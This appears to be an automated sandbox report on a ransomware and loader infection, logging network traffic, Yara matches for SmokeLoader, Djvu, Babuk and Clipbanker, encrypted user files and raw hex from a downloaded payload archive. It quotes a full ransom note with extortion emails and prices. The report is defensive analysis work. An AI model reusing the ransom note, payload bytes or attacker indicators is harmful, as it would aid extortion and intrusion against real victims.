Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 21 Jun 2023 02:28:28 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 21 Jun 2023 02:28:38 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf

Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80

Source: 6C74.exe, 00000018.00000003.489622517.0000000003170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 6C74.exe, 00000018.00000003.490026604.0000000003170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: 6C74.exe, 00000018.00000003.490127284.0000000003170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://waqxengrru.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: potunulit.org

Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.233.24.19:443 -> 192.168.2.3:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.233.24.19:443 -> 192.168.2.3:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 80.66.203.53:443 -> 192.168.2.3:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.233.24.19:443 -> 192.168.2.3:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49779 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.379855236.0000000002161000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.450171034.0000000002000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.475973961.0000000000691000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.475785512.0000000000660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.450322842.0000000002021000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.379758047.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: file.exe, 00000000.00000002.379778973.00000000007C8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

Found ransom note / readme

Source: C:\_readme.txt

Dropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.You can get and look video overview decrypt tool:https://we.tl/t-vKvLYNOV9oPrice of private key and decrypt software is $980.Discount 50% available if you contact us first 72 hours, that's price for you is $490.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshmail.topReserve e-mail address to contact us:datarestorehelp@airmail.ccYour personal ID:0731JOsielfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT

Jump to dropped file

Yara detected Babuk Ransomware

Source: Yara match

File source: Process Memory Space: 6C74.exe PID: 3676, type: MEMORYSTR

Yara detected Djvu Ransomware

Source: Yara match	File source: 21.2.6C74.exe.23315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.759F.exe.23a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.86ED.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.AF5C.exe.27415a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.86ED.exe.27015a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.759F.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.9B15.exe.26615a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.AF5C.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.759F.exe.22d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.6C74.exe.23315a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.759F.exe.22f15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.759F.exe.22515a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.759F.exe.23a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.759F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.86ED.exe.27015a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.AF5C.exe.27415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.759F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.6C74.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.E8B1.exe.28f15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.E8B1.exe.28f15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.6C74.exe.23315a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.6000.exe.22815a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.6000.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.759F.exe.22d15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.9B15.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.E8B1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.6C74.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.9B15.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.6C74.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.759F.exe.22515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.6C74.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.759F.exe.22f15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.759F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.759F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.6000.exe.22815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.6C74.exe.23315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.86ED.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.AF5C.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.E8B1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.6000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.9B15.exe.26615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.759F.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.478959888.00000000028F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.473987426.0000000002660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.497631299.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.448562068.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.461647833.0000000002740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.483438291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.475860220.0000000002700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.441041476.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.477291278.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.452421978.0000000002250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.462688817.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.485496524.0000000002280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.500232401.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 759F.exe PID: 7636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 759F.exe PID: 7656, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 759F.exe PID: 7744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6C74.exe PID: 7764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6C74.exe PID: 7824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 759F.exe PID: 7864, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 759F.exe PID: 7972, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 759F.exe PID: 7992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AF5C.exe PID: 8152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6C74.exe PID: 8172, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 9B15.exe PID: 5172, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AF5C.exe PID: 7180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6C74.exe PID: 3676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 86ED.exe PID: 2300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 9B15.exe PID: 3312, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 86ED.exe PID: 1476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: E8B1.exe PID: 7184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: E8B1.exe PID: 7356, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 759F.exe PID: 7412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6000.exe PID: 7420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 759F.exe PID: 7448, type: MEMORYSTR

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\AppData\Local\Temp\6C74.exe	File moved: C:\Users\user\Desktop\NWCXBPIUYI.jpg
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	File deleted: C:\Users\user\Desktop\NWCXBPIUYI.jpg
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	File moved: C:\Users\user\Desktop\HMPPSXQPQV.png
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	File deleted: C:\Users\user\Desktop\HMPPSXQPQV.png
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	File moved: C:\Users\user\Desktop\CZQKSDDMWR.png

Writes a notice file (html or txt) to demand a ransom

Source: C:\Users\user\AppData\Local\Temp\6C74.exe	File dropped: C:\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-vkvlynov9oprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshmail.topreserve e-mail address to contact us:datarestorehelp@airmail.ccyour personal id:0731josielfyrgbm7az5zpjjggzygva9vfh6xpmk3xwjgrumt			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	File dropped: C:\Users\user\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-vkvlynov9oprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshmail.topreserve e-mail address to contact us:datarestorehelp@airmail.ccyour personal id:0731josielfyrgbm7az5zpjjggzygva9vfh6xpmk3xwjgrumt			Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 39.2.mstsca.exe.1360000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 39.2.mstsca.exe.1360000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
